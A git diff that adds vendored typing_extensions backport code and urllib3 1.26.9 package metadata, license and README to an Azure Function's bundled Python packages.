+        def __eq__(self, other):
+            if not isinstance(other, ParamSpecArgs):
+                return NotImplemented
+            return self.__origin__ == other.__origin__
+
+    class ParamSpecKwargs(_Immutable):
+        """The kwargs for a ParamSpec object.
+
+        Given a ParamSpec object P, P.kwargs is an instance of ParamSpecKwargs.
+
+        ParamSpecKwargs objects have a reference back to their ParamSpec:
+
+        P.kwargs.__origin__ is P
+
+        This type is meant for runtime introspection and has no special meaning to
+        static type checkers.
+        """
+        def __init__(self, origin):
+            self.__origin__ = origin
+
+        def __repr__(self):
+            return f"{self.__origin__.__name__}.kwargs"
+
+        def __eq__(self, other):
+            if not isinstance(other, ParamSpecKwargs):
+                return NotImplemented
+            return self.__origin__ == other.__origin__
+
+# 3.10+
+if hasattr(typing, 'ParamSpec'):
+    ParamSpec = typing.ParamSpec
+# 3.7-3.9
+else:
+
+    # Inherits from list as a workaround for Callable checks in Python < 3.9.2.
+    class ParamSpec(list):
+        """Parameter specification variable.
+
+        Usage::
+
+           P = ParamSpec('P')
+
+        Parameter specification variables exist primarily for the benefit of static
+        type checkers. They are used to forward the parameter types of one
+        callable to another callable, a pattern commonly found in higher order
+        functions and decorators. They are only valid when used in ``Concatenate``,
+        or as the first argument to ``Callable``. In Python 3.10 and higher,
+        they are also supported in user-defined Generics at runtime.
+        See class Generic for more information on generic types. An
+        example for annotating a decorator::
+
+           T = TypeVar('T')
+           P = ParamSpec('P')
+
+           def add_logging(f: Callable[P, T]) -> Callable[P, T]:
+               '''A type-safe decorator to add logging to a function.'''
+               def inner(*args: P.args, **kwargs: P.kwargs) -> T:
+                   logging.info(f'{f.__name__} was called')
+                   return f(*args, **kwargs)
+               return inner
+
+           @add_logging
+           def add_two(x: float, y: float) -> float:
+               '''Add two numbers together.'''
+               return x + y
+
+        Parameter specification variables defined with covariant=True or
+        contravariant=True can be used to declare covariant or contravariant
+        generic types. These keyword arguments are valid, but their actual semantics
+        are yet to be decided. See PEP 612 for details.
+
+        Parameter specification variables can be introspected. e.g.:
+
+           P.__name__ == 'P'
+           P.__bound__ == None
+           P.__covariant__ == False
+           P.__contravariant__ == False
+
+        Note that only parameter specification variables defined in global scope can
+        be pickled.
+        """
+
+        # Trick Generic __parameters__.
+        __class__ = typing.TypeVar
+
+        @property
+        def args(self):
+            return ParamSpecArgs(self)
+
+        @property
+        def kwargs(self):
+            return ParamSpecKwargs(self)
+
+        def __init__(self, name, *, bound=None, covariant=False, contravariant=False):
+            super().__init__([self])
+            self.__name__ = name
+            self.__covariant__ = bool(covariant)
+            self.__contravariant__ = bool(contravariant)
+            if bound:
+                self.__bound__ = typing._type_check(bound, 'Bound must be a type.')
+            else:
+                self.__bound__ = None
+
+            # for pickling:
+            try:
+                def_mod = sys._getframe(1).f_globals.get('__name__', '__main__')
+            except (AttributeError, ValueError):
+                def_mod = None
+            if def_mod != 'typing_extensions':
+                self.__module__ = def_mod
+
+        def __repr__(self):
+            if self.__covariant__:
+                prefix = '+'
+            elif self.__contravariant__:
+                prefix = '-'
+            else:
+                prefix = '~'
+            return prefix + self.__name__
+
+        def __hash__(self):
+            return object.__hash__(self)
+
+        def __eq__(self, other):
+            return self is other
+
+        def __reduce__(self):
+            return self.__name__
+
+        # Hack to get typing._type_check to pass.
+        def __call__(self, *args, **kwargs):
+            pass
+
+
+# 3.7-3.9
+if not hasattr(typing, 'Concatenate'):
+    # Inherits from list as a workaround for Callable checks in Python < 3.9.2.
+    class _ConcatenateGenericAlias(list):
+
+        # Trick Generic into looking into this for __parameters__.
+        __class__ = typing._GenericAlias
+
+        # Flag in 3.8.
+        _special = False
+
+        def __init__(self, origin, args):
+            super().__init__(args)
+            self.__origin__ = origin
+            self.__args__ = args
+
+        def __repr__(self):
+            _type_repr = typing._type_repr
+            return (f'{_type_repr(self.__origin__)}'
+                    f'[{", ".join(_type_repr(arg) for arg in self.__args__)}]')
+
+        def __hash__(self):
+            return hash((self.__origin__, self.__args__))
+
+        # Hack to get typing._type_check to pass in Generic.
+        def __call__(self, *args, **kwargs):
+            pass
+
+        @property
+        def __parameters__(self):
+            return tuple(
+                tp for tp in self.__args__ if isinstance(tp, (typing.TypeVar, ParamSpec))
+            )
+
+
+# 3.7-3.9
+@typing._tp_cache
+def _concatenate_getitem(self, parameters):
+    if parameters == ():
+        raise TypeError("Cannot take a Concatenate of no types.")
+    if not isinstance(parameters, tuple):
+        parameters = (parameters,)
+    if not isinstance(parameters[-1], ParamSpec):
+        raise TypeError("The last parameter to Concatenate should be a "
+                        "ParamSpec variable.")
+    msg = "Concatenate[arg, ...]: each arg must be a type."
+    parameters = tuple(typing._type_check(p, msg) for p in parameters)
+    return _ConcatenateGenericAlias(self, parameters)
+
+
+# 3.10+
+if hasattr(typing, 'Concatenate'):
+    Concatenate = typing.Concatenate
+    _ConcatenateGenericAlias = typing._ConcatenateGenericAlias  # noqa
+# 3.9
+elif sys.version_info[:2] >= (3, 9):
+    @_TypeAliasForm
+    def Concatenate(self, parameters):
+        """Used in conjunction with ``ParamSpec`` and ``Callable`` to represent a
+        higher order function which adds, removes or transforms parameters of a
+        callable.
+
+        For example::
+
+           Callable[Concatenate[int, P], int]
+
+        See PEP 612 for detailed information.
+        """
+        return _concatenate_getitem(self, parameters)
+# 3.7-8
+else:
+    class _ConcatenateForm(typing._SpecialForm, _root=True):
+        def __repr__(self):
+            return 'typing_extensions.'
+ self._name + + def __getitem__(self, parameters): + return _concatenate_getitem(self, parameters) + + Concatenate = _ConcatenateForm( + 'Concatenate', + doc="""Used in conjunction with ``ParamSpec`` and ``Callable`` to represent a + higher order function which adds, removes or transforms parameters of a + callable. + + For example:: + + Callable[Concatenate[int, P], int] + + See PEP 612 for detailed information. + """) + +# 3.10+ +if hasattr(typing, 'TypeGuard'): + TypeGuard = typing.TypeGuard +# 3.9 +elif sys.version_info[:2] >= (3, 9): + class _TypeGuardForm(typing._SpecialForm, _root=True): + def __repr__(self): + return 'typing_extensions.' + self._name + + @_TypeGuardForm + def TypeGuard(self, parameters): + """Special typing form used to annotate the return type of a user-defined + type guard function. ``TypeGuard`` only accepts a single type argument. + At runtime, functions marked this way should return a boolean. + + ``TypeGuard`` aims to benefit *type narrowing* -- a technique used by static + type checkers to determine a more precise type of an expression within a + program's code flow. Usually type narrowing is done by analyzing + conditional code flow and applying the narrowing to a block of code. The + conditional expression here is sometimes referred to as a "type guard". + + Sometimes it would be convenient to use a user-defined boolean function + as a type guard. Such a function should use ``TypeGuard[...]`` as its + return type to alert static type checkers to this intention. + + Using ``-> TypeGuard`` tells the static type checker that for a given + function: + + 1. The return value is a boolean. + 2. If the return value is ``True``, the type of its argument + is the type inside ``TypeGuard``. + + For example:: + + def is_str(val: Union[str, float]): + # "isinstance" type guard + if isinstance(val, str): + # Type of ``val`` is narrowed to ``str`` + ... + else: + # Else, type of ``val`` is narrowed to ``float``. + ... + + Strict type narrowing is not enforced -- ``TypeB`` need not be a narrower + form of ``TypeA`` (it can even be a wider form) and this may lead to + type-unsafe results. The main reason is to allow for things like + narrowing ``List[object]`` to ``List[str]`` even though the latter is not + a subtype of the former, since ``List`` is invariant. The responsibility of + writing type-safe type guards is left to the user. + + ``TypeGuard`` also works with type variables. For more information, see + PEP 647 (User-Defined Type Guards). + """ + item = typing._type_check(parameters, f'{self} accepts only a single type.') + return typing._GenericAlias(self, (item,)) +# 3.7-3.8 +else: + class _TypeGuardForm(typing._SpecialForm, _root=True): + + def __repr__(self): + return 'typing_extensions.' + self._name + + def __getitem__(self, parameters): + item = typing._type_check(parameters, + f'{self._name} accepts only a single type') + return typing._GenericAlias(self, (item,)) + + TypeGuard = _TypeGuardForm( + 'TypeGuard', + doc="""Special typing form used to annotate the return type of a user-defined + type guard function. ``TypeGuard`` only accepts a single type argument. + At runtime, functions marked this way should return a boolean. + + ``TypeGuard`` aims to benefit *type narrowing* -- a technique used by static + type checkers to determine a more precise type of an expression within a + program's code flow. Usually type narrowing is done by analyzing + conditional code flow and applying the narrowing to a block of code. 
The + conditional expression here is sometimes referred to as a "type guard". + + Sometimes it would be convenient to use a user-defined boolean function + as a type guard. Such a function should use ``TypeGuard[...]`` as its + return type to alert static type checkers to this intention. + + Using ``-> TypeGuard`` tells the static type checker that for a given + function: + + 1. The return value is a boolean. + 2. If the return value is ``True``, the type of its argument + is the type inside ``TypeGuard``. + + For example:: + + def is_str(val: Union[str, float]): + # "isinstance" type guard + if isinstance(val, str): + # Type of ``val`` is narrowed to ``str`` + ... + else: + # Else, type of ``val`` is narrowed to ``float``. + ... + + Strict type narrowing is not enforced -- ``TypeB`` need not be a narrower + form of ``TypeA`` (it can even be a wider form) and this may lead to + type-unsafe results. The main reason is to allow for things like + narrowing ``List[object]`` to ``List[str]`` even though the latter is not + a subtype of the former, since ``List`` is invariant. The responsibility of + writing type-safe type guards is left to the user. + + ``TypeGuard`` also works with type variables. For more information, see + PEP 647 (User-Defined Type Guards). + """) + + +# Vendored from cpython typing._SpecialFrom +class _SpecialForm(typing._Final, _root=True): + __slots__ = ('_name', '__doc__', '_getitem') + + def __init__(self, getitem): + self._getitem = getitem + self._name = getitem.__name__ + self.__doc__ = getitem.__doc__ + + def __getattr__(self, item): + if item in {'__name__', '__qualname__'}: + return self._name + + raise AttributeError(item) + + def __mro_entries__(self, bases): + raise TypeError(f"Cannot subclass {self!r}") + + def __repr__(self): + return f'typing_extensions.{self._name}' + + def __reduce__(self): + return self._name + + def __call__(self, *args, **kwds): + raise TypeError(f"Cannot instantiate {self!r}") + + def __or__(self, other): + return typing.Union[self, other] + + def __ror__(self, other): + return typing.Union[other, self] + + def __instancecheck__(self, obj): + raise TypeError(f"{self} cannot be used with isinstance()") + + def __subclasscheck__(self, cls): + raise TypeError(f"{self} cannot be used with issubclass()") + + @typing._tp_cache + def __getitem__(self, parameters): + return self._getitem(self, parameters) + + +if hasattr(typing, "LiteralString"): + LiteralString = typing.LiteralString +else: + @_SpecialForm + def LiteralString(self, params): + """Represents an arbitrary literal string. + + Example:: + + from typing_extensions import LiteralString + + def query(sql: LiteralString) -> ...: + ... + + query("SELECT * FROM table") # ok + query(f"SELECT * FROM {input()}") # not ok + + See PEP 675 for details. + + """ + raise TypeError(f"{self} is not subscriptable") + + +if hasattr(typing, "Self"): + Self = typing.Self +else: + @_SpecialForm + def Self(self, params): + """Used to spell the type of "self" in classes. + + Example:: + + from typing import Self + + class ReturnsSelf: + def parse(self, data: bytes) -> Self: + ... + return self + + """ + + raise TypeError(f"{self} is not subscriptable") + + +if hasattr(typing, "Never"): + Never = typing.Never +else: + @_SpecialForm + def Never(self, params): + """The bottom type, a type that has no members. 
+ + This can be used to define a function that should never be + called, or a function that never returns:: + + from typing_extensions import Never + + def never_call_me(arg: Never) -> None: + pass + + def int_or_str(arg: int | str) -> None: + never_call_me(arg) # type checker error + match arg: + case int(): + print("It's an int") + case str(): + print("It's a str") + case _: + never_call_me(arg) # ok, arg is of type Never + + """ + + raise TypeError(f"{self} is not subscriptable") + + +if hasattr(typing, 'Required'): + Required = typing.Required + NotRequired = typing.NotRequired +elif sys.version_info[:2] >= (3, 9): + class _ExtensionsSpecialForm(typing._SpecialForm, _root=True): + def __repr__(self): + return 'typing_extensions.' + self._name + + @_ExtensionsSpecialForm + def Required(self, parameters): + """A special typing construct to mark a key of a total=False TypedDict + as required. For example: + + class Movie(TypedDict, total=False): + title: Required[str] + year: int + + m = Movie( + title='The Matrix', # typechecker error if key is omitted + year=1999, + ) + + There is no runtime checking that a required key is actually provided + when instantiating a related TypedDict. + """ + item = typing._type_check(parameters, f'{self._name} accepts only a single type.') + return typing._GenericAlias(self, (item,)) + + @_ExtensionsSpecialForm + def NotRequired(self, parameters): + """A special typing construct to mark a key of a TypedDict as + potentially missing. For example: + + class Movie(TypedDict): + title: str + year: NotRequired[int] + + m = Movie( + title='The Matrix', # typechecker error if key is omitted + year=1999, + ) + """ + item = typing._type_check(parameters, f'{self._name} accepts only a single type.') + return typing._GenericAlias(self, (item,)) + +else: + class _RequiredForm(typing._SpecialForm, _root=True): + def __repr__(self): + return 'typing_extensions.' + self._name + + def __getitem__(self, parameters): + item = typing._type_check(parameters, + f'{self._name} accepts only a single type.') + return typing._GenericAlias(self, (item,)) + + Required = _RequiredForm( + 'Required', + doc="""A special typing construct to mark a key of a total=False TypedDict + as required. For example: + + class Movie(TypedDict, total=False): + title: Required[str] + year: int + + m = Movie( + title='The Matrix', # typechecker error if key is omitted + year=1999, + ) + + There is no runtime checking that a required key is actually provided + when instantiating a related TypedDict. + """) + NotRequired = _RequiredForm( + 'NotRequired', + doc="""A special typing construct to mark a key of a TypedDict as + potentially missing. For example: + + class Movie(TypedDict): + title: str + year: NotRequired[int] + + m = Movie( + title='The Matrix', # typechecker error if key is omitted + year=1999, + ) + """) + + +if hasattr(typing, "Unpack"): # 3.11+ + Unpack = typing.Unpack +elif sys.version_info[:2] >= (3, 9): + class _UnpackSpecialForm(typing._SpecialForm, _root=True): + def __repr__(self): + return 'typing_extensions.' + self._name + + class _UnpackAlias(typing._GenericAlias, _root=True): + __class__ = typing.TypeVar + + @_UnpackSpecialForm + def Unpack(self, parameters): + """A special typing construct to unpack a variadic type. For example: + + Shape = TypeVarTuple('Shape') + Batch = NewType('Batch', int) + + def add_batch_axis( + x: Array[Unpack[Shape]] + ) -> Array[Batch, Unpack[Shape]]: ... 
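+
+        Under PEP 646, ``Unpack`` also spells the type of a variadic
+        ``*args`` parameter; a brief sketch (the ``process`` function is
+        hypothetical)::
+
+            def process(*args: Unpack[Shape]) -> None: ...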
+ + """ + item = typing._type_check(parameters, f'{self._name} accepts only a single type.') + return _UnpackAlias(self, (item,)) + + def _is_unpack(obj): + return isinstance(obj, _UnpackAlias) + +else: + class _UnpackAlias(typing._GenericAlias, _root=True): + __class__ = typing.TypeVar + + class _UnpackForm(typing._SpecialForm, _root=True): + def __repr__(self): + return 'typing_extensions.' + self._name + + def __getitem__(self, parameters): + item = typing._type_check(parameters, + f'{self._name} accepts only a single type.') + return _UnpackAlias(self, (item,)) + + Unpack = _UnpackForm( + 'Unpack', + doc="""A special typing construct to unpack a variadic type. For example: + + Shape = TypeVarTuple('Shape') + Batch = NewType('Batch', int) + + def add_batch_axis( + x: Array[Unpack[Shape]] + ) -> Array[Batch, Unpack[Shape]]: ... + + """) + + def _is_unpack(obj): + return isinstance(obj, _UnpackAlias) + + +if hasattr(typing, "TypeVarTuple"): # 3.11+ + TypeVarTuple = typing.TypeVarTuple +else: + class TypeVarTuple: + """Type variable tuple. + + Usage:: + + Ts = TypeVarTuple('Ts') + + In the same way that a normal type variable is a stand-in for a single + type such as ``int``, a type variable *tuple* is a stand-in for a *tuple* + type such as ``Tuple[int, str]``. + + Type variable tuples can be used in ``Generic`` declarations. + Consider the following example:: + + class Array(Generic[*Ts]): ... + + The ``Ts`` type variable tuple here behaves like ``tuple[T1, T2]``, + where ``T1`` and ``T2`` are type variables. To use these type variables + as type parameters of ``Array``, we must *unpack* the type variable tuple using + the star operator: ``*Ts``. The signature of ``Array`` then behaves + as if we had simply written ``class Array(Generic[T1, T2]): ...``. + In contrast to ``Generic[T1, T2]``, however, ``Generic[*Shape]`` allows + us to parameterise the class with an *arbitrary* number of type parameters. + + Type variable tuples can be used anywhere a normal ``TypeVar`` can. + This includes class definitions, as shown above, as well as function + signatures and variable annotations:: + + class Array(Generic[*Ts]): + + def __init__(self, shape: Tuple[*Ts]): + self._shape: Tuple[*Ts] = shape + + def get_shape(self) -> Tuple[*Ts]: + return self._shape + + shape = (Height(480), Width(640)) + x: Array[Height, Width] = Array(shape) + y = abs(x) # Inferred type is Array[Height, Width] + z = x + x # ... is Array[Height, Width] + x.get_shape() # ... is tuple[Height, Width] + + """ + + # Trick Generic __parameters__. + __class__ = typing.TypeVar + + def __iter__(self): + yield self.__unpacked__ + + def __init__(self, name): + self.__name__ = name + + # for pickling: + try: + def_mod = sys._getframe(1).f_globals.get('__name__', '__main__') + except (AttributeError, ValueError): + def_mod = None + if def_mod != 'typing_extensions': + self.__module__ = def_mod + + self.__unpacked__ = Unpack[self] + + def __repr__(self): + return self.__name__ + + def __hash__(self): + return object.__hash__(self) + + def __eq__(self, other): + return self is other + + def __reduce__(self): + return self.__name__ + + def __init_subclass__(self, *args, **kwds): + if '_root' not in kwds: + raise TypeError("Cannot subclass special typing classes") + + +if hasattr(typing, "reveal_type"): + reveal_type = typing.reveal_type +else: + def reveal_type(__obj: T) -> T: + """Reveal the inferred type of a variable. 
+ + When a static type checker encounters a call to ``reveal_type()``, + it will emit the inferred type of the argument:: + + x: int = 1 + reveal_type(x) + + Running a static type checker (e.g., ``mypy``) on this example + will produce output similar to 'Revealed type is "builtins.int"'. + + At runtime, the function prints the runtime type of the + argument and returns it unchanged. + + """ + print(f"Runtime type is {type(__obj).__name__!r}", file=sys.stderr) + return __obj + + +if hasattr(typing, "assert_never"): + assert_never = typing.assert_never +else: + def assert_never(__arg: Never) -> Never: + """Assert to the type checker that a line of code is unreachable. + + Example:: + + def int_or_str(arg: int | str) -> None: + match arg: + case int(): + print("It's an int") + case str(): + print("It's a str") + case _: + assert_never(arg) + + If a type checker finds that a call to assert_never() is + reachable, it will emit an error. + + At runtime, this throws an exception when called. + + """ + raise AssertionError("Expected code to be unreachable") + + +if hasattr(typing, 'dataclass_transform'): + dataclass_transform = typing.dataclass_transform +else: + def dataclass_transform( + *, + eq_default: bool = True, + order_default: bool = False, + kw_only_default: bool = False, + field_specifiers: typing.Tuple[ + typing.Union[typing.Type[typing.Any], typing.Callable[..., typing.Any]], + ... + ] = (), + **kwargs: typing.Any, + ) -> typing.Callable[[T], T]: + """Decorator that marks a function, class, or metaclass as providing + dataclass-like behavior. + + Example: + + from typing_extensions import dataclass_transform + + _T = TypeVar("_T") + + # Used on a decorator function + @dataclass_transform() + def create_model(cls: type[_T]) -> type[_T]: + ... + return cls + + @create_model + class CustomerModel: + id: int + name: str + + # Used on a base class + @dataclass_transform() + class ModelBase: ... + + class CustomerModel(ModelBase): + id: int + name: str + + # Used on a metaclass + @dataclass_transform() + class ModelMeta(type): ... + + class ModelBase(metaclass=ModelMeta): ... + + class CustomerModel(ModelBase): + id: int + name: str + + Each of the ``CustomerModel`` classes defined in this example will now + behave similarly to a dataclass created with the ``@dataclasses.dataclass`` + decorator. For example, the type checker will synthesize an ``__init__`` + method. + + The arguments to this decorator can be used to customize this behavior: + - ``eq_default`` indicates whether the ``eq`` parameter is assumed to be + True or False if it is omitted by the caller. + - ``order_default`` indicates whether the ``order`` parameter is + assumed to be True or False if it is omitted by the caller. + - ``kw_only_default`` indicates whether the ``kw_only`` parameter is + assumed to be True or False if it is omitted by the caller. + - ``field_specifiers`` specifies a static list of supported classes + or functions that describe fields, similar to ``dataclasses.field()``. + + At runtime, this decorator records its arguments in the + ``__dataclass_transform__`` attribute on the decorated object. + + See PEP 681 for details. 
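+
+        The recorded arguments can be inspected at runtime through that
+        attribute; a small sketch, reusing the ``create_model`` decorator
+        from the example above::
+
+            create_model.__dataclass_transform__["eq_default"]  # True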
+ + """ + def decorator(cls_or_fn): + cls_or_fn.__dataclass_transform__ = { + "eq_default": eq_default, + "order_default": order_default, + "kw_only_default": kw_only_default, + "field_specifiers": field_specifiers, + "kwargs": kwargs, + } + return cls_or_fn + return decorator + + +# We have to do some monkey patching to deal with the dual nature of +# Unpack/TypeVarTuple: +# - We want Unpack to be a kind of TypeVar so it gets accepted in +# Generic[Unpack[Ts]] +# - We want it to *not* be treated as a TypeVar for the purposes of +# counting generic parameters, so that when we subscript a generic, +# the runtime doesn't try to substitute the Unpack with the subscripted type. +if not hasattr(typing, "TypeVarTuple"): + typing._collect_type_vars = _collect_type_vars + typing._check_generic = _check_generic + + +# Backport typing.NamedTuple as it exists in Python 3.11. +# In 3.11, the ability to define generic `NamedTuple`s was supported. +# This was explicitly disallowed in 3.9-3.10, and only half-worked in <=3.8. +if sys.version_info >= (3, 11): + NamedTuple = typing.NamedTuple +else: + def _caller(): + try: + return sys._getframe(2).f_globals.get('__name__', '__main__') + except (AttributeError, ValueError): # For platforms without _getframe() + return None + + def _make_nmtuple(name, types, module, defaults=()): + fields = [n for n, t in types] + annotations = {n: typing._type_check(t, f"field {n} annotation must be a type") + for n, t in types} + nm_tpl = collections.namedtuple(name, fields, + defaults=defaults, module=module) + nm_tpl.__annotations__ = nm_tpl.__new__.__annotations__ = annotations + # The `_field_types` attribute was removed in 3.9; + # in earlier versions, it is the same as the `__annotations__` attribute + if sys.version_info < (3, 9): + nm_tpl._field_types = annotations + return nm_tpl + + _prohibited_namedtuple_fields = typing._prohibited + _special_namedtuple_fields = frozenset({'__module__', '__name__', '__annotations__'}) + + class _NamedTupleMeta(type): + def __new__(cls, typename, bases, ns): + assert _NamedTuple in bases + for base in bases: + if base is not _NamedTuple and base is not typing.Generic: + raise TypeError( + 'can only inherit from a NamedTuple type and Generic') + bases = tuple(tuple if base is _NamedTuple else base for base in bases) + types = ns.get('__annotations__', {}) + default_names = [] + for field_name in types: + if field_name in ns: + default_names.append(field_name) + elif default_names: + raise TypeError(f"Non-default namedtuple field {field_name} " + f"cannot follow default field" + f"{'s' if len(default_names) > 1 else ''} " + f"{', '.join(default_names)}") + nm_tpl = _make_nmtuple( + typename, types.items(), + defaults=[ns[n] for n in default_names], + module=ns['__module__'] + ) + nm_tpl.__bases__ = bases + if typing.Generic in bases: + class_getitem = typing.Generic.__class_getitem__.__func__ + nm_tpl.__class_getitem__ = classmethod(class_getitem) + # update from user namespace without overriding special namedtuple attributes + for key in ns: + if key in _prohibited_namedtuple_fields: + raise AttributeError("Cannot overwrite NamedTuple attribute " + key) + elif key not in _special_namedtuple_fields and key not in nm_tpl._fields: + setattr(nm_tpl, key, ns[key]) + if typing.Generic in bases: + nm_tpl.__init_subclass__() + return nm_tpl + + def NamedTuple(__typename, __fields=None, **kwargs): + if __fields is None: + __fields = kwargs.items() + elif kwargs: + raise TypeError("Either list of fields or keywords" + " can be provided to 
NamedTuple, not both") + return _make_nmtuple(__typename, __fields, module=_caller()) + + NamedTuple.__doc__ = typing.NamedTuple.__doc__ + _NamedTuple = type.__new__(_NamedTupleMeta, 'NamedTuple', (), {}) + + # On 3.8+, alter the signature so that it matches typing.NamedTuple. + # The signature of typing.NamedTuple on >=3.8 is invalid syntax in Python 3.7, + # so just leave the signature as it is on 3.7. + if sys.version_info >= (3, 8): + NamedTuple.__text_signature__ = '(typename, fields=None, /, **kwargs)' + + def _namedtuple_mro_entries(bases): + assert NamedTuple in bases + return (_NamedTuple,) + + NamedTuple.__mro_entries__ = _namedtuple_mro_entries diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/LICENSE.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/LICENSE.txt new file mode 100644 index 0000000..47127f3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/LICENSE.txt @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2008-2020 Andrey Petrov and contributors (see CONTRIBUTORS.txt) + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/METADATA new file mode 100644 index 0000000..f74a2f3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/METADATA @@ -0,0 +1,1426 @@ +Metadata-Version: 2.1 +Name: urllib3 +Version: 1.26.9 +Summary: HTTP library with thread-safe connection pooling, file post, and more. 
+Home-page: https://urllib3.readthedocs.io/ +Author: Andrey Petrov +Author-email: andrey.petrov@shazow.net +License: MIT +Project-URL: Documentation, https://urllib3.readthedocs.io/ +Project-URL: Code, https://github.com/urllib3/urllib3 +Project-URL: Issue tracker, https://github.com/urllib3/urllib3/issues +Keywords: urllib httplib threadsafe filepost http https ssl pooling +Platform: UNKNOWN +Classifier: Environment :: Web Environment +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: MIT License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 2 +Classifier: Programming Language :: Python :: 2.7 +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.5 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Topic :: Internet :: WWW/HTTP +Classifier: Topic :: Software Development :: Libraries +Requires-Python: >=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, <4 +Description-Content-Type: text/x-rst +License-File: LICENSE.txt +Provides-Extra: brotli +Requires-Dist: brotlicffi (>=0.8.0) ; ((os_name != "nt" or python_version >= "3") and platform_python_implementation != "CPython") and extra == 'brotli' +Requires-Dist: brotli (>=1.0.9) ; ((os_name != "nt" or python_version >= "3") and platform_python_implementation == "CPython") and extra == 'brotli' +Requires-Dist: brotlipy (>=0.6.0) ; (os_name == "nt" and python_version < "3") and extra == 'brotli' +Provides-Extra: secure +Requires-Dist: pyOpenSSL (>=0.14) ; extra == 'secure' +Requires-Dist: cryptography (>=1.3.4) ; extra == 'secure' +Requires-Dist: idna (>=2.0.0) ; extra == 'secure' +Requires-Dist: certifi ; extra == 'secure' +Requires-Dist: ipaddress ; (python_version == "2.7") and extra == 'secure' +Provides-Extra: socks +Requires-Dist: PySocks (!=1.5.7,<2.0,>=1.5.6) ; extra == 'socks' + + +urllib3 is a powerful, *user-friendly* HTTP client for Python. Much of the +Python ecosystem already uses urllib3 and you should too. +urllib3 brings many critical features that are missing from the Python +standard libraries: + +- Thread safety. +- Connection pooling. +- Client-side SSL/TLS verification. +- File uploads with multipart encoding. +- Helpers for retrying requests and dealing with HTTP redirects. +- Support for gzip, deflate, and brotli encoding. +- Proxy support for HTTP and SOCKS. +- 100% test coverage. + +urllib3 is powerful and easy to use: + +.. code-block:: python + + >>> import urllib3 + >>> http = urllib3.PoolManager() + >>> r = http.request('GET', 'http://httpbin.org/robots.txt') + >>> r.status + 200 + >>> r.data + 'User-agent: *\nDisallow: /deny\n' + + +Installing +---------- + +urllib3 can be installed with `pip `_:: + + $ python -m pip install urllib3 + +Alternatively, you can grab the latest source code from `GitHub `_:: + + $ git clone git://github.com/urllib3/urllib3.git + $ pip install . + + +Documentation +------------- + +urllib3 has usage and reference documentation at `urllib3.readthedocs.io `_. 
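+
+As an illustrative sketch (the target URL and values here are arbitrary), the
+retry and timeout helpers mentioned in the feature list above can be
+configured per request:
+
+.. code-block:: python
+
+    import urllib3
+
+    http = urllib3.PoolManager()
+    r = http.request(
+        'GET',
+        'http://httpbin.org/robots.txt',
+        retries=urllib3.Retry(total=3, backoff_factor=0.5),
+        timeout=urllib3.Timeout(connect=1.0, read=2.0),
+    )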
+ + +Contributing +------------ + +urllib3 happily accepts contributions. Please see our +`contributing documentation `_ +for some tips on getting started. + + +Security Disclosures +-------------------- + +To report a security vulnerability, please use the +`Tidelift security contact `_. +Tidelift will coordinate the fix and disclosure with maintainers. + + +Maintainers +----------- + +- `@sethmlarson `__ (Seth M. Larson) +- `@pquentin `__ (Quentin Pradet) +- `@theacodes `__ (Thea Flowers) +- `@haikuginger `__ (Jess Shapiro) +- `@lukasa `__ (Cory Benfield) +- `@sigmavirus24 `__ (Ian Stapleton Cordasco) +- `@shazow `__ (Andrey Petrov) + +👋 + + +Sponsorship +----------- + +If your company benefits from this library, please consider `sponsoring its +development `_. + + +For Enterprise +-------------- + +.. |tideliftlogo| image:: https://nedbatchelder.com/pix/Tidelift_Logos_RGB_Tidelift_Shorthand_On-White_small.png + :width: 75 + :alt: Tidelift + +.. list-table:: + :widths: 10 100 + + * - |tideliftlogo| + - Professional support for urllib3 is available as part of the `Tidelift + Subscription`_. Tidelift gives software development teams a single source for + purchasing and maintaining their software, with professional grade assurances + from the experts who know it best, while seamlessly integrating with existing + tools. + +.. _Tidelift Subscription: 